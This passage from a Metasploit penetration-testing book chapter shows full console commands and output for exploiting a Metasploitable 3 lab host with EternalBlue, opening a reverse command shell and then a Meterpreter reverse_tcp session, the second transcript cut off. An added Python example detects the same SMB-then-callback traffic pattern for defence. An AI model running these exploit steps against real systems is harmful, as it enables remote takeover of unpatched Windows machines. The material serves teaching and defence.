Chapter 6: Owning Metasploit
changed, although a fair number could be changed. You will see that the only option I
set before running the exploit is the remote host. You will also see the exploit runs
perfectly, and we get remote access to the system.
Example 6-7. Exploiting Metasploitable 3 with EternalBlue
msf exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.86.48
RHOST => 192.168.86.48
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.86.21:4444
[*] 192.168.86.48:445 - Connecting to target for exploitation.
[+] 192.168.86.48:445 - Connection established for exploitation.
[+] 192.168.86.48:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.86.48:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.86.48:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.86.48:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.86.48:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.86.48:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.86.48:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.86.48:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.86.48:445 - Sending all but last fragment of exploit packet
[*] 192.168.86.48:445 - Starting non-paged pool grooming
[+] 192.168.86.48:445 - Sending SMBv2 buffers
[+] 192.168.86.48:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.86.48:445 - Sending final SMBv2 buffers.
[*] 192.168.86.48:445 - Sending last fragment of exploit packet!
[*] 192.168.86.48:445 - Receiving response from exploit packet
[+] 192.168.86.48:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.86.48:445 - Sending egg to corrupted connection.
[*] 192.168.86.48:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.86.21:4444 -> 192.168.86.48:49273) at 2018-01-29 18:07:32 -0700
[+] 192.168.86.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.86.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.86.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
What you will notice from here is that we get a command prompt, just as if you were to run cmd.exe on a Windows system. You will be able to run any command in this session that you would be able to run there. This may be limited, though you can launch PowerShell from this command interface. This will give you access to cmdlets that can be used to manage the system and gather information from it.

Exploiting Your Target | 183

In addition to running PowerShell, you can switch out the payload so you are using Meterpreter instead. This gives us a set of functions that have nothing to do with the operating system or with any capabilities or limitations of the shell or command interpreter we are presented with. In Example 6-8, I'm still using the EternalBlue exploit, but I've changed out the payload. This will return a Meterpreter shell instead of the command interpreter.
Example 6-8. Exploiting EternalBlue to get Meterpreter
msf exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.86.21:4444
[*] 192.168.86.48:445 - Connecting to target
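Seen from the network, both transcripts share one pattern: the target accepts an inbound SMB connection on tcp/445 and shortly afterwards opens a brand-new connection back to the attacking host on the handler port (192.168.86.21:4444 -> 192.168.86.48:49273 above), which an ordinary SMB client never does. The Python below is an added example, not code from the book or from Metasploit; it flags that pattern over simplified connection records whose format and sample values are constructed here.

```python
# Added example: detect the "inbound SMB, then outbound callback to the same peer"
# pattern that a reverse_tcp payload produces. Conn records are a constructed,
# simplified form of Zeek conn.log fields, not the book's or any real tool's format.
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Conn:
    ts: float     # connection start, seconds since epoch
    src: str
    sport: int
    dst: str
    dport: int


def find_smb_reverse_connections(conns: List[Conn], window: float = 60.0
                                 ) -> List[Tuple[str, str, int, float]]:
    """Return (victim, attacker, callback_port, delay_seconds) for every inbound
    tcp/445 connection that is followed, within `window` seconds, by a connection
    from the victim back to the same peer on a non-SMB port."""
    hits: List[Tuple[str, str, int, float]] = []
    for smb in (c for c in conns if c.dport == 445):
        for c in conns:
            if c.src == smb.dst and c.dst == smb.src and c.dport != 445:
                delay = c.ts - smb.ts
                hit = (smb.dst, smb.src, c.dport, delay)
                if 0 <= delay <= window and hit not in hits:
                    hits.append(hit)
    return hits


# Constructed sample using the addresses from Example 6-7: attacker 192.168.86.21,
# target 192.168.86.48. The third record is benign SMB traffic with no callback.
SAMPLE = [
    Conn(1517274440.0, "192.168.86.21", 50512, "192.168.86.48", 445),
    Conn(1517274452.0, "192.168.86.48", 49273, "192.168.86.21", 4444),
    Conn(1517274900.0, "192.168.86.30", 51000, "192.168.86.48", 445),
]

if __name__ == "__main__":
    for victim, attacker, port, delay in find_smb_reverse_connections(SAMPLE):
        print(f"{victim} called back to {attacker}:{port} {delay:.0f}s after inbound SMB")
```

The callback port is deliberately not fixed at 4444, since the handler port is an operator choice; the 445-then-callback ordering is the signal.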